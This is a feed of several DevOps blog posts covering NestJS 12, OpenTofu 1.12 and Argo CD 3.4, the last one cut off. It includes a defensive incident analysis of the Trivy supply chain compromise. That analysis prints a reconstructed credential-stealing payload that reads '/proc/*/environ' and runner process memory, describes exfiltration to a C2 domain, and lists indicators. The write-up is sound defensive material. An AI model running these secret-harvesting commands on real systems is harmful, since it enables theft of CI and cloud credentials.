DEV Community: daniel jeong

NestJS 12 Deep Dive — Full ESM Migration, Standard Schema Route Validation, and the Vitest·oxlint·Rspack Toolchain

daniel jeong — Fri, 05 Jun 2026 06:06:19 +0000

If you've written Node.js backends, you've almost certainly been stopped cold by ERR_REQUIRE_ESM. That error — thrown the moment you try to require() an ESM-only package from a CommonJS project — has been one of the most time-wasting sources of friction in the Node.js ecosystem for years. On April 30, 2026, NestJS published a draft PR (#16391) outlining the scope of v12.0.0, with a decision that ends that friction head-on: a full ESM migration of every package. Alongside it, route decorators gain Standard Schema validation, and the default toolchain is swapped from Jest, ESLint, and Webpack to Vitest, oxlint, and Rspack. This post breaks down what NestJS 12 changes — and how existing projects should prepare — using the official PR and InfoQ reporting as primary sources.

1. NestJS 12 at a Glance

NestJS is a progressive Node.js framework for TypeScript server-side applications, providing a modular architecture on top of Express or Fastify. With over 75,000 GitHub stars, it's an enterprise standard. v12 targets early Q3 2026, and its core distills into four changes.

Area	v11 (current)	v12 (early Q3 2026)
Module system	CommonJS	ESM (all packages migrated)
Input validation	class-validator centric	Standard Schema option (Zod, Valibot, ArkType)
Testing	Jest	Vitest + OXC (default for ESM projects)
Linter	ESLint	oxlint (default everywhere)
Bundler	Webpack	Rspack (Webpack deprecated)

Framework creator Kamil Myśliwiec stated in the PR that the transition "should not introduce major breaking changes for existing projects." There are a few minor breaking changes across other packages, but "nothing significant." The character of this major release is therefore not an API-breaking upgrade, but an infrastructure upgrade that modernizes the module system and developer tooling. The decorator-based programming model for controllers, providers, and modules stays the same, so most application code runs untouched. The center of gravity is the build, run, and validation pipeline — not the application surface.

2. Why ESM Now — require(esm) Stability as the Premise

ESM migration was deferred for a clear reason: with most of the ecosystem still CommonJS-based, going ESM-only would force users to absorb mandatory import syntax, top-level await constraints, and the absence of __dirname all at once. Myśliwiec pinpointed exactly this:

"The availability of require(esm) was the missing piece that made the move to ESM practical — without it, the migration wouldn't have made much sense." — Kamil Myśliwiec

require(esm) is a Node.js feature that lets you load synchronous ES modules from CommonJS via require(). Introduced experimentally in 2024 and thoroughly battle-tested, it's now unflagged across all supported LTS lines (v20.19.0+, v22.12.0+) and marked stable. The key was dispelling the misconception that ESM is inherently asynchronous, enabling syntax-based synchronous evaluation of ESM. As a result, existing CommonJS projects can require() NestJS 12's ESM packages directly, minimizing migration friction.

// NestJS 12 — CommonJS projects can require ESM packages directly
// (Node.js v20.19+ / v22.12+ : require(esm) stable)
const { NestFactory } = require('@nestjs/core'); // ESM package, still works

// New ESM projects naturally use import
import { NestFactory } from '@nestjs/core';
import { AppModule } from './app.module.js'; // ESM: explicit (.js) extension recommended

⚠️ Caution: require(esm) only applies to synchronously evaluable ESM. If the target ESM uses top-level await, require() throws ERR_REQUIRE_ASYNC_MODULE. In new ESM projects, relative imports must specify the extension (.js), and you must use import.meta.url instead of __dirname.

3. Standard Schema — Beyond class-validator

The biggest change backend developers will feel in NestJS 12 is Standard Schema support in route decorators. Every route decorator — @Body, @Query, @Param — accepts a new schema option that takes a Standard Schema–compatible object. The same capability extends to the serializer interceptor.

3.1 What Is Standard Schema?

Standard Schema is not a validation library but a roughly 60-line TypeScript interface. Designed jointly by the creators of Zod, Valibot, and ArkType, it works by having each library expose a ~standard property on its schemas, so any tool that understands Standard Schema can validate data without knowing which library produced the schema. Its core method is a single validate(unknown) that returns either a typed value on success or an array of issues on failure.

The value of this interface is eliminating vendor lock-in. It reduces the relationship between validation libraries and consuming tools from N×M to N+M. Start with familiar Zod, move to smaller-bundle Valibot, or adopt type-level ArkType — all without rewriting your route or handler code. NestJS validation has long been tightly bound to class-validator and class-transformer, a combination that depends on reflect-metadata for decorator metadata and requires DTOs to be declared as classes. Standard Schema support turns that constraint into a choice — especially valuable for teams that want a single schema source driving both runtime validation and static types, or for monorepos sharing the same Zod schema across frontend and backend.

3.2 In Practice — Route Validation with a Zod Schema

// NestJS 12 — use a Standard Schema directly instead of a class-validator DTO
import { Controller, Post, Body } from '@nestjs/common';
import { z } from 'zod';

// Define a Zod schema (Zod already implements Standard Schema's ~standard)
const CreateUserSchema = z.object({
  email: z.string().email(),
  name: z.string().min(2).max(100),
  role: z.enum(['admin', 'instructor', 'student']).default('student'),
});

// Infer the type from the schema — no separate DTO class needed
type CreateUserDto = z.infer<typeof CreateUserSchema>;

@Controller('users')
export class UsersController {
  @Post()
  create(@Body({ schema: CreateUserSchema }) dto: CreateUserDto) {
    // dto is already validated, parsed, and type-safe
    return { created: dto.email, role: dto.role };
  }
}

Approach	Validation definition	Characteristics
class-validator (existing)	Decorators + DTO class	Runtime metadata, depends on reflect-metadata
Zod	`z.object({...})`	Most widely adopted, rich ecosystem
Valibot	Functional pipeline	Excellent tree-shaking, small bundles
ArkType	Type-string syntax	Type-system-level validation, high performance

💡 Tip: class-validator and Standard Schema are not mutually exclusive. Existing DTO-based validation still works in NestJS 12, so a safe strategy is to adopt Standard Schema for new endpoints first. Both validation packages are also flagged as optional — if you don't use them, they're never installed.

4. Toolchain Modernization — Rust Arrives

NestJS 12 swaps out its default tools en masse for faster feedback loops, aligning with the broader trend of Rust-powered JavaScript tooling becoming the standard. Notably, all three replacements — Vitest's transform layer, oxlint, and Rspack — share the same direction: native speed and ESM friendliness. Jest, ESLint, and Webpack were optimized for the CommonJS era; in ESM-native projects their configuration complexity and cold-start costs grew, accumulating with codebase size. The v12 toolchain swap is less a trend-chase than a necessary counterpart to the ESM migration.

4.1 Jest → Vitest (+ OXC)

All repositories and sample projects have migrated from Jest to Vitest, with OXC providing TypeScript decorator support. New ESM projects use Vitest by default, while CJS schematics continue to use Jest. Vitest's strengths are a fast Vite-based watch mode and native ESM execution.

# NestJS 12 CLI — prompts for module system at project creation
$ nest new my-api
? Which module system do you want to use?
  > ESM  (Vitest + oxlint default)
    CommonJS  (Jest + existing tools)

# With ESM selected, the test runner is Vitest
$ npm run test     # runs vitest

4.2 ESLint → oxlint, Webpack → Rspack

For linting, oxlint replaces ESLint across all projects. Written in Rust as the linter of the OXC toolchain, oxlint delivers checks tens of times faster on large codebases. For bundling, Rspack replaces Webpack, which is now deprecated. Rspack aims to be a drop-in replacement with a Webpack-compatible API and significantly faster build times.

⚠️ Caution: In roadmap discussions, whether the default bundler will be Vite + SWC instead of Rspack is not yet settled ("nothing is set in stone"). Requests to add Bun and Biome as CLI options exist but aren't officially adopted. Packages are expected to ship under the next npm tag before the stable release, so validating with next builds before production adoption is recommended.

5. Other Changes

Beyond the headline changes, several improvements affect real-world work. In microservices, the migration to NATS v3 follows the latest message transport client API; the Express adapter's graceful shutdown support lets in-flight requests finish safely during zero-downtime deployments and rolling updates. The WebSocket disconnect reason parameter lets you distinguish termination causes at the code level, useful for refining reconnection logic and observability.

Area	Change
Microservices	NATS v3 migration
Express adapter	Graceful shutdown support
WebSocket	disconnect reason parameter
Pipes	Improved `transform` type safety
Exceptions	Custom `errorCode` option in `HttpExceptionOptions`
Website	Full official site redesign planned

6. Preparing to Migrate — ManoIT's Recommended Strategy

A dedicated v11→v12 migration guide isn't published yet. But the PR's direction is clear, so ManoIT recommends a phased preparation for internal NestJS backends.

First, align your runtime to Node.js 22 LTS. You need v22.12+ or v20.19+ — where require(esm) is stable — to fully reap v12's ESM benefits. Second, adopt Standard Schema (Zod) validation for new endpoints to gradually reduce class-validator dependence. Third, adopt Vitest and oxlint locally ahead of time to shorten CI feedback loops and narrow the gap with v12's default toolchain. Fourth, run regression tests on next-tag builds in staging before the stable release to surface minor breaking changes early. Fifth, batch-align package upgrades with npm-check-updates, but pin core dependencies for predictability.

# Prepare for v12 — apply now on your current v11 project
node -v                          # confirm v22.12+ or v20.19+ (require(esm) stable)
npm i -D vitest @vitest/coverage-v8   # adopt alongside Jest, then migrate gradually
npm i -D oxlint                  # run alongside ESLint, compare speed, then switch
npm i zod                        # introduce Standard Schema validation (new endpoints)

# After GA: pre-validate with the next tag
npm i @nestjs/core@next @nestjs/common@next

💡 Tip: The most common ESM pitfalls are missing extensions on relative imports and use of __dirname. Setting tsconfig's moduleResolution to NodeNext and appending .js extensions while still on v11 dramatically reduces the code changes needed at v12.

7. Closing — The ESM Era for Backend Frameworks

NestJS 12's message is clear: with require(esm) stable, the last obstacle blocking the Node.js ecosystem's ESM migration is gone, and an enterprise standard framework fired the starting gun. ESM-native migration, freedom of validation libraries via Standard Schema, and modernization toward a Rust-based toolchain look like independent improvements, but they point in one direction: a faster, less locked-in, standards-faithful backend. GA lands in early Q3 2026, but the core lessons — align to Node 22 LTS, adopt schema validation incrementally, pre-adopt Vitest and oxlint — can start today on your v11 project. With preparation, migration won't be an event; for ready teams, it'll be a one-line dependency update.

This post was written by the ManoIT tech blog automation pipeline, cross-verifying the official NestJS PR #16391, InfoQ reporting, and the Standard Schema specification. Version and timeline details are accurate as of the writing date (2026-06-05) and may change at GA — re-check the official docs before applying. · AI writing assistance: Claude (Anthropic)

Originally published at ManoIT Tech Blog.

Inside the Trivy Supply Chain Compromise (CVE-2026-33634): 76 Hijacked Tags, Runner.Worker Memory Secret Theft & SHA Pinning

daniel jeong — Wed, 03 Jun 2026 23:40:21 +0000

What happens when the security scanner meant to protect your pipeline turns into the malware that steals your secrets? On March 19, 2026, that is exactly what happened to Trivy (aquasecurity). Trivy is the most widely adopted open-source vulnerability scanner in the cloud-native ecosystem, embedded in thousands of CI/CD pipelines as the aquasecurity/trivy-action GitHub Action — and by design it has access to pipeline secrets. Compromise a tool like that, and the attacker doesn't just get code: they get cloud credentials, SSH keys, and Kubernetes tokens — everything the pipeline touches.

This post breaks down the official advisory GHSA-69fq-xp46-6x23 (CVE-2026-33634, Critical) as the primary source: what happened, how the payload worked, and the SHA-pinning-based remediation ManoIT applied to its internal pipelines.

1. What Happened — When a Security Tool Becomes the Weapon

This was not a single poisoned package. It was a multi-channel strike that hit GitHub Actions, release binaries, Docker Hub images, and package repositories simultaneously. The threat actor — TeamPCP (the payload calls itself "TeamPCP Cloud Stealer") — force-pushed 76 of 77 tags in aquasecurity/trivy-action and all 7 tags in aquasecurity/setup-trivy to malicious commits at 17:43 UTC on March 19. Less than an hour later, at 18:22 UTC, a forged v0.69.4 binary was distributed across GitHub Releases, GHCR, Docker Hub, ECR Public, deb/rpm, and get.trivy.dev.

It didn't stop there. Three days later, on March 22, the attacker used separately stolen Docker Hub credentials to push malicious v0.69.5, v0.69.6, and latest images, bypassing GitHub-based controls entirely. The same day, using a service account token (Argon-DevOps-Mgt) bridging two GitHub orgs, they defaced all 44 repositories in Aqua Security's aquasec-com org with a tpcp-docs- prefix and exposed proprietary source.

Time (UTC)	Event	Channel
Late Feb – 3/1	Initial breach, partial (non-atomic) credential rotation	Release infra
3/19 17:43	trivy-action 76 + setup-trivy 7 tags force-pushed	GitHub Actions
3/19 18:22	Forged v0.69.4 binary distributed (~3h exposure)	All channels
3/20 05:40	trivy-action tags restored (~12h exposure closed)	GitHub Actions
3/22	v0.69.5/v0.69.6/latest images (~10h), 44 repos defaced	Docker Hub

2. Root Cause — Non-Atomic Credential Rotation

The March incident didn't come out of nowhere — it was a continuation of a supply chain attack that began in late February 2026. After the initial disclosure on March 1, credential rotation was performed but was not atomic — not all credentials were revoked simultaneously. While rotation dragged on over several days, the attacker used still-valid tokens to re-exfiltrate the newly rotated secrets, retaining the residual access that enabled the March 19 attack.

⚠️ Caution: In incident response, "we rotated the credentials" is not sufficient. The window between revocation and reissue becomes the channel for the second breach. Rotation must be atomic — bulk-invalidate old credentials and issue new ones as a single unit of work.

3. Breaking Down the Attack

3.1 trivy-action Tag Hijacking — `@v0.34.0` Is a Pointer, Not a Contract

The core of this attack abused two by-design properties of Git and GitHub: mutable tags and self-declared commit identity. By default, tags are not immutable references. Anyone with push access can repoint an existing tag to an entirely different commit. The attacker force-pushed 76 tags to malicious commits and injected the payload into entrypoint.sh so it ran immediately before the legitimate Trivy scan. Pipelines looked normal while the stealer ran silently underneath. The imposter commits spoofed maintainer identities, but GitHub flagged them with "This commit does not belong to any branch on this repository."

3.2 Forging the v0.69.4 Binary — goreleaser `--skip=validate`

1) Push commit 1885610c
   -> swap actions/checkout reference to imposter commit 70379aad
   -> composite action that downloads malicious Go source from a typosquatted domain
2) Add --skip=validate to goreleaser -> disable binary integrity validation
3) Tag that commit as v0.69.4 -> trigger the release pipeline

A single line that turns off build validation (--skip=validate) nullified the entire integrity guarantee.

3.3 The Payload — Reading Secrets Straight Out of Runner.Worker Memory

The most dangerous technique bypassed GitHub Actions' secret masking head-on.

# Payload behavior (reconstructed)
# 1) Scan environment variables of all runner processes
cat /proc/*/environ          # first-pass collection of SSH keys / env secrets

# 2) Key technique: read the Runner.Worker process memory directly
#    A base64-encoded Python payload targets values marked isSecret:true
#    -> secrets that show as *** in logs are extracted in plaintext from memory
python3 -c '... read /proc/<worker_pid>/mem ...'

# 3) Sweep 50+ paths: AWS/GCP/Azure tokens, k8s configs,
#    Docker configs, Terraform state, Git credentials, wallets, shell history

Collected data was AES-256-CBC + RSA-4096 hybrid encrypted and exfiltrated via HTTPS POST to the typosquatted C2 domain scan[.]aquasecurtiy[.]org (mimicking Aqua's name, 45.148.10.212 in Amsterdam). If the C2 was unreachable and a GitHub PAT was present, the malware created a public tpcp-docs repository on the victim's account and uploaded the stolen data as release assets — turning GitHub itself into the exfiltration channel.

4. Affected vs. Safe Versions

The lesson is blunt: the safe reference is a full commit SHA, not a version tag. Why the safe versions are safe is telling too — v0.69.3 and trivy-action v0.35.0 were protected by GitHub Immutable Releases (enabled 3/3 and 3/4, before the attack).

Component	Affected	Exposure	Safe
trivy binary	v0.69.4	~3h (3/19)	v0.69.3 or earlier
trivy (Docker Hub)	v0.69.5, v0.69.6, latest	~10h (3/22–24)	v0.69.3 or earlier (digest-pinned)
trivy-action	tags 0.0.1–0.34.2 (76)	~12h (3/19–20)	v0.35.0 (`57a97c7`) or SHA-pinned
setup-trivy	all releases	~4h (3/19)	v0.2.6 (`3fb12ec`) or SHA-pinned

⚠️ Caution: A malicious v0.70.0 push was stopped just before the tag landed, so treat any v0.70.0 reference in logs as suspicious. Also, mirror.gcr.io may still serve cached malicious images — reference by digest (@sha256:...). The force-pushed old tags (0.0.1–0.34.2) hardened into immutable releases and can't be recreated under the same names; they were re-published with a v prefix.

5. Detection & Response Playbook

You need a fast answer to "were we exposed, and if so, what do we rotate?" Treat every secret accessible to a workflow that ran a compromised version during the exposure windows as compromised.

# 1) Fallback exfil trace -- search org for tpcp-docs repos (presence = successful exfil)
gh repo list <ORG> --limit 1000 --json name \
  | jq -r '.[].name' | grep -i 'tpcp-docs'

# 2) Check 3/19-20 workflow run logs for trivy-action tag references
gh run list --repo <ORG>/<REPO> --created 2026-03-19..2026-03-20 \
  --json databaseId,workflowName,createdAt

# 3) Block C2 indicators at the network level + review historical connections
#    domain: scan[.]aquasecurtiy[.]org   IP: 45.148.10.212

Then rotate all potentially exposed secrets atomically: GitHub tokens, cloud provider credentials, registry tokens, SSH keys, DB passwords. Audit for secondary compromise — unauthorized repos, unexpected workflow runs, infrastructure changes.

6. The Real Fix — SHA Pinning and Immutable Releases

The single most important lesson: mutable tags are a liability. Pin every third-party Action to a full commit SHA, and even if a tag is repointed via force-push, your workflow only runs the commit you intended.

# BAD -- mutable tag (can be force-pushed at any time)
- uses: aquasecurity/trivy-action@0.34.0

# GOOD -- full commit SHA pin + comment for version readability
- uses: aquasecurity/trivy-action@57a97c7  # v0.35.0
  with:
    scan-type: 'fs'
    severity: 'CRITICAL,HIGH'
- uses: aquasecurity/setup-trivy@3fb12ec    # v0.2.6

Verify binaries and images with sigstore signatures, confirming both integrity and signing time (that it was signed before the 3/19 attack).

# sigstore verification for the binary
cosign verify-blob \
  --certificate-identity-regexp 'https://github\.com/aquasecurity/' \
  --certificate-oidc-issuer 'https://token.actions.githubusercontent.com' \
  --bundle trivy_0.69.2_Linux-64bit.tar.gz.sigstore.json \
  trivy_0.69.2_Linux-64bit.tar.gz
# Verified OK  -> additionally confirm the signing time predates the 3/19 attack

Defense layer	Action	Attack surface closed
Reference immutability	Pin Actions to full SHA, images to digest	Tag hijacking / force-push
Integrity verification	sigstore/cosign signature + signing time check	Forged binaries / images
Release protection	Enable GitHub Immutable Releases	Release asset rewriting
Credential hygiene	Atomic rotation, least-privilege tokens, short-lived OIDC	Residual access / second breach
Runner monitoring	Watch CI runners like production hosts	/proc/mem secret theft

7. How ManoIT Responded Internally

ManoIT used this incident to roll the following into its GitOps/CI pipelines in stages. First, pin every third-party GitHub Action to a full SHA, with Renovate/Dependabot raising update PRs at SHA granularity. Second, digest-pin container base and scanner images, and exclude cache mirrors like mirror.gcr.io from the trust boundary. Third, migrate CI secrets from static PATs to OIDC-based short-lived tokens so that even if stolen, their lifetime is short. Fourth, write "atomic rotation" explicitly into the incident runbook — coupling revoke and reissue into a single operation to eliminate the time window. Fifth, attach runtime security (eBPF-based process/network monitoring) to CI runner nodes to detect /proc/<pid>/mem access and anomalous outbound traffic.

8. Closing — Your Security Tools Are Part of Your Attack Surface

The message of the Trivy compromise is clear: your security tools are part of your attack surface. Trivy holds privileged access to CI secrets by design, and that very privilege makes it an ideal target. Single-layer defense doesn't survive modern multi-channel, multi-stage supply chain attacks — only defense in depth, stacking reference immutability, integrity verification, credential hygiene, and runner monitoring, holds up. The project has since recovered its normal release cadence, shipping v0.71.0 (2026-06-01) as the latest stable, and the core lessons — SHA pinning and Immutable Releases — are now standard practice well beyond Trivy. The point isn't to distrust your tools — it's to pin your references immutably and prove their integrity.

Category	Indicator (IoC)
C2 domain	`scan[.]aquasecurtiy[.]org`
C2 IP	`45.148.10.212` (Amsterdam)
Rogue trivy commit	`1885610c`
Malicious checkout commit	`70379aad`
Compromised setup-trivy commit	`8afa9b9f9183b4e00c46e2b82d34047e3c177bd0`
Exfil artifact	public repos named `tpcp-docs`
Commit warning	"This commit does not belong to any branch on this repository"

Originally published on the ManoIT blog. Cross-verified against the official advisory GHSA-69fq-xp46-6x23 / CVE-2026-33634. Version and IoC data are current as of 2026-06-04; re-check the official advisory before acting. · AI writing assist: Claude (Anthropic)

Originally published at ManoIT Tech Blog.

OpenTofu 1.12.0: Dynamic prevent_destroy, destroy=false, Identity Import & Provider Checksum Automation

daniel jeong — Wed, 03 Jun 2026 00:55:24 +0000

Anyone who has run Infrastructure as Code (IaC) in production for a while knows it: the hard part isn't creating a resource — it's protecting that resource differently per environment, detaching it safely, importing existing ones accurately, and not wrestling with lock files in CI.

OpenTofu 1.12.0 (released May 14, 2026) takes direct aim at exactly these operational pains. Forked from Terraform after HashiCorp's 2023 BSL license change, OpenTofu added OCI registry support and native S3 locking in 1.10, ephemeral values and the enabled meta-argument in 1.11, and has now diverged into a mature IaC engine on its own track rather than "a fork chasing Terraform." This article breaks down five of 1.12's key features from an operations and architecture angle, then lays out how ManoIT rolled them into our internal multi-cloud IaC.

1. Why OpenTofu 1.12 Now — From Fork to Its Own Track

Some context first. When IBM acquired HashiCorp in December 2024, enterprise uncertainty around the BSL license grew, accelerating OpenTofu evaluation. As of April 2026, roughly 12% of IaC practitioners have adopted OpenTofu, with another 27% planning to evaluate or expand it, while organizations like Boeing, Capital One, and AMD run it in production. Many teams run both — Terraform for legacy, OpenTofu for greenfield.

The important shift is that the two tools are no longer two versions of the same product. OpenTofu has diverged toward native state encryption, provider-defined functions, and a faster release cadence; Terraform has gone toward AI-assisted features and deeper HCP integration. 1.12 sits in the middle of that divergence as a signal of operational maturity: "lifecycle control made dynamic, imports made accurate, lock files made automatic."

Version	Released	Theme	Headline
1.10.0	2025-06	Deployment / security base	OCI registry, native S3 lock, external key providers (state encryption)
1.11	H2 2025	Expressiveness	Ephemeral values, `enabled` meta-argument, stronger moved/removed
1.12.0	2026-05-14	Operational maturity	Dynamic prevent_destroy, destroy=false, identity import, checksum automation, -json-into

2. Dynamic prevent_destroy — Per-Environment Delete Protection via Variables

prevent_destroy is a lifecycle argument that tells OpenTofu to error out if a plan would destroy a given object. It's commonly used for objects whose deletion would cause a major outage, or whose recreation requires manual work outside OpenTofu (like restoring a backup). The problem: until now this value was a static decision hard-coded into configuration. If you share a module across prod and dev — wanting the prod database extremely hard to delete but the dev one easy to replace — a static value left you stuck.

1.12.0 lets prevent_destroy be defined dynamically in terms of other values within the same module (such as input variables). It's the first lifecycle argument to be made dynamic, with more planned (umbrella issue #1329).

variable "prevent_destroy_database" {
  type    = bool
  default = true   # Protected by default. Turn off via the dev module block.
}

resource "example_database" "example" {
  # ...

  lifecycle {
    # 1.12: can reference variables -> control delete protection per environment from one module
    prevent_destroy = var.prevent_destroy_database
  }
}

Ops tip: keep the shared module default at true (protected) and pass false explicitly only from dev/staging callers. "Safe by default, exceptions explicit" is the pattern that prevents deletion accidents with the least code.

3. destroy = false — Remove From State Without Destroying the Remote Object

Another new lifecycle meta-argument, destroy = false, lets you remove a managed resource from state without first destroying the remote object. Previously, "I want to take this out of OpenTofu management but keep the actual infrastructure alive" had to be worked around with removed blocks or state rm. Expressed as a lifecycle argument, the intent now stays in code.

resource "aws_s3_bucket" "legacy_logs" {
  bucket = "manoit-legacy-logs"

  lifecycle {
    # Exclude from destroy plans -> bucket is preserved even when dropped from state
    destroy = false
  }
}

⚠️ Warning: an object dropped from state via destroy = false is no longer tracked by OpenTofu. If other code creates a new resource with the same name, you may hit an "already exists" conflict — sort out your import/naming policy right after detaching.

4. Resource Identity Import — From Guessing IDs to Schema-Based

In OpenTofu, importing existing infrastructure has long meant "getting the resource's id string exactly right." But id formats vary wildly by resource type, and resources using composite keys (multiple combined attributes) are awkward to express in a single id. 1.12.0 introduces import by resource identity, pointing at the remote object via the attributes defined by the resource type's identity schema, instead of a single id string.

For example, hashicorp/aws's aws_ssm_maintenance_window_target has an identity schema requiring both id and window_id. You can now specify these via the import block's identity argument.

import {
  to = aws_ssm_maintenance_window_target.example

  # 1.12: point precisely via identity schema attributes instead of guessing id
  identity = {
    window_id = "mw-0123456789abcdef0"
    id        = "12345678-90ab-cdef-1234-567890abcdef"
  }
}

For bulk imports, combine this with the import block's for_each (loopable imports, introduced in 1.10). The identity-schema + for_each combo turns "deterministically importing hundreds of existing resources" into a single block.

5. Provider Checksum & Install Improvements — The End of tofu providers lock

This is the change CI/CD operators will welcome most. Previously, teams using a global plugin cache or local mirror found the dependency lock file missing checksums after tofu init, forcing a separate tofu providers lock run. The lock file only had zh: (zip hashes), while the h1: hashes needed for cache/mirror verification were only computed locally.

In 1.12.0, the OpenTofu Registry officially provides the full set of checksum formats needed by all install methods. So a single tofu init fills the lock file with both h1: and zh: hashes, letting you verify a global cache or local mirror immediately. tofu providers lock now remains only for its original purpose: populating origin-registry checksums on systems reconfigured to use an alternate install source.

# After upgrading, the first init auto-adds h1: hashes to the lock file
tofu init

# No longer needed just because of cache/mirror (as long as you use the default registry)
# tofu providers lock -platform=linux_amd64 -platform=darwin_arm64

# Confirm both zh:/h1: hash types landed in the lock file
grep -E '"(zh|h1):' .terraform.lock.hcl | head

On top of this, concurrent provider installation was added. When many providers are needed, install requests are parallelized to cut tofu init time. The effect is most noticeable on monolithic root modules with 10+ providers.

Situation	Up to 1.11	1.12.0
Global cache / mirror verification	run `providers lock` manually after `init`	h1 & zh auto-filled in one `init`
Installing many providers	sequential requests	concurrent (parallel) -> faster init
Lock file hashes	mostly `zh:`, `h1:` computed locally	full formats prepopulated at install time

6. Simultaneous Output (-json-into) and Observable IaC

Many OpenTofu commands support both human-oriented UI output and machine-readable JSON, but until now you could only get one or the other. For tools building alternative UIs, this meant "you must reimplement the entire UI from JSON alone before it's usable." 1.12.0's -json-into=FILENAME option sends the same machine-readable output as -json to a separate file, while the standard output keeps showing the normal human-facing UI.

# Human UI in the terminal, machine JSON to a file, simultaneously
tofu apply -json-into=apply-events.json

# To consume streaming events in real time, use a named pipe / special device
mkfifo /tmp/tofu-events
tofu apply -json-into=/tmp/tofu-events &
# Read the pipe from another process to update a web/terminal UI instantly

Stream the JSON into an IPC object like a named pipe or /dev/fd/N, and an external tool can responsively display progress concurrently with OpenTofu's execution. Combined with the local-only OpenTelemetry tracing introduced in 1.10, this opens the path to treating "IaC execution as an observable pipeline."

7. Deprecations — WinRM Provisioners and 32-bit

1.12 is an operations-hardening release with few breaking changes, but you must be aware of two deprecation notices.

Item	1.12 status	Action
WinRM provisioner connections	warning (deprecated), still functional	slated for removal in v1.13 -> migrate to OpenSSH for Windows
32-bit CPU (`386`, `arm`) official builds	no change in 1.12 (notice only)	warnings from v1.13 -> builds dropped later, move to 64-bit (amd64/arm64)

⚠️ Warning: if you have provisioners using connection { type = "winrm" }, "later" won't cut it. It's fully removed in v1.13, so use this upgrade as the trigger to plan an OpenSSH-for-Windows migration. 32-bit environments likewise need a 64-bit move reviewed within the next year.

8. Cumulative Changes: 1.10 -> 1.12

For teams jumping from 1.9 or below, here are the cumulative highlights.

Area	Introduced	Core
State encryption (external key providers)	1.10	AWS/GCP KMS, OpenBao, PBKDF2 key provider chaining
Native S3 state locking	1.10	S3 backend locking without DynamoDB
OCI registry distribution	1.10	distribute providers/modules to air-gapped environments
Ephemeral values / `enabled` meta-argument	1.11	in-memory-only data, conditional enable beyond count/for_each
Dynamic prevent_destroy / destroy=false	1.12	per-environment delete protection, state-only removal
Identity import / checksum automation	1.12	schema-based import, full hashes in one init

9. ManoIT Internal Adoption Checklist

#	Task	Owner	Done when
1	Bump staging root module to 1.12.0, review lock-file diff after first `init`	Platform	h1 & zh hashes auto-added confirmed
2	Parameterize `prevent_destroy` in shared DB/storage modules (default true)	Module owners	prod=protected, dev=off controlled by caller
3	Apply `destroy = false` to legacy resources to keep but unmanage	Domain owners	0 destroys in plan, remote object preserved
4	Re-organize composite-key resources (SSM targets, etc.) via identity import	Domain owners	deterministic import via import block + for_each
5	Remove the manual `tofu providers lock` step from CI	DevOps	init alone verifies cache/mirror
6	Stream apply events to the internal dashboard via `-json-into`	Observability	live execution progress displayed
7	Inventory WinRM provisioners -> OpenSSH migration roadmap	Infra	0 winrm uses before v1.13

10. Conclusion — "The Next IaC Challenge Isn't Creation, It's Lifecycle"

If I had to sum up OpenTofu 1.12.0 in one line: "creating resources is a solved problem; what remains is the lifecycle operations of protecting them differently per environment, detaching them safely, importing them accurately, and not fighting lock files." Dynamic prevent_destroy lets you control delete protection per environment from a single module. destroy = false keeps the intent of "unmanage but preserve" in code. Identity import ends the era of guessing IDs. Checksum automation strips the manual tofu providers lock out of CI. And -json-into elevates IaC execution into an observable pipeline.

Three closing recommendations. (1) Review the lock-file diff on the first init after upgrading — a bulk addition of h1 hashes is normal, and committing it makes cache/mirror friction disappear. (2) Parameterize prevent_destroy in shared modules — the change that cuts deletion accidents most for the least code. (3) If you use WinRM provisioners, inventory them now — the v1.13 removal is not "optional" but a "scheduled deadline." The shortest one-liner: "this sprint, bump staging to 1.12, turn the shared DB module's prevent_destroy into a variable, and run plans on both prod and dev once."

Originally published at ManoIT Tech Blog.

Argo CD 3.4 Deep Dive: Cluster Pause Reconciliation, Helm valueFiles Globs & Source Hydrator Commit Authorship

daniel jeong — Mon, 01 Jun 2026 22:32:04 +0000

Anyone who has moved GitOps from demo to production knows the hard part isn't deploying — it's everything after, the so-called Day-2 operations. An incident hits at midnight, but the Argo CD controller keeps stubbornly reconciling everything back to its "desired state." Your values files have multiplied into dozens per environment and you'd kill for a single glob. Hydration commits give no clue who authored them. And on dual-stack clusters, mysterious DNS timeouts quietly eat away at the controller.

Argo CD 3.4 (GA in May 2026, first stable tag v3.4.1) takes direct aim at exactly these operational pains. As the official v3.4.1 release notes put it, the focus of this cycle is Day-2: incident management, alert routing, and Helm template flexibility. This article breaks down the root cause behind five of 3.4's key features from an operations and architecture angle, then lays out how ManoIT rolled them into our internal multi-cluster GitOps.

1. Why 3.4 — Quarterly Cadence, Center of Gravity Shifts to Day-2

Some context first. Argo CD ships a minor release once per quarter (every 3 months), and only the three most recent minor versions get patches. If 3.2 was about UI and performance and 3.3 established the Source Hydrator (the rendered-manifests pattern that hydrates manifests into a separate branch), then 3.4 sits on top of that and asks: "in production, what do we pause, what do we track, and what do we route?" The feature freeze locked at v3.4.0-rc2, GA landed early May 2026, and patches followed quickly — v3.4.3 arrived on May 28, 2026.

Version	GA	Theme	Headline
3.2	H2 2025	UI / performance	UI overhaul, controller perf
3.3	Early 2026	Rendered manifests	Source Hydrator, PreDelete Hooks
3.4	2026-05	Day-2 operations	Cluster pause, Helm globs, hydrator commit author, AppSet Watch, gRPC DNS TXT off

3.4 is an operations-hardening release with few breaking changes, but two environment shifts must be checked before upgrading (see section 7). First, the new features.

2. Per-Cluster Pause Reconciliation — A New Standard for Incident Response

Until now, "pausing reconciliation" in Argo CD meant per-application (switching an Application's sync policy to manual, or applying a sync window). The problem: the unit of an incident is often an entire cluster. When a target cluster is unstable but the controller keeps pushing hundreds of its apps toward desired state, unintended rollbacks and redeploys pile on in the middle of an outage and make things worse.

3.4 introduces an annotation that pauses reconciliation for an entire cluster (PR #26442). Add the pause annotation to the cluster secret (or target resource) and the controller stops attempting reconciles against that cluster. It's exactly "hitting the brakes at the cluster level."

# Add the pause annotation to a cluster secret -> reconcile halts for that cluster
apiVersion: v1
kind: Secret
metadata:
  name: cluster-prod-apac
  namespace: argocd
  labels:
    argocd.argoproj.io/secret-type: cluster
  annotations:
    # WARNING: pausing only stops "automatic convergence to desired state."
    # Already-running workloads keep running, and drift can accumulate.
    argocd.argoproj.io/pause-reconciliation: "true"
type: Opaque
stringData:
  name: prod-apac
  server: https://k8s-prod-apac.internal:6443

Ops tip: read pause as "observation continues, only auto-convergence stops." Drift accumulates during the incident, so right after un-pausing, always inspect the diff first and sync only the intended changes.

3. Helm valueFiles Wildcard Globs — Taming the values File Explosion

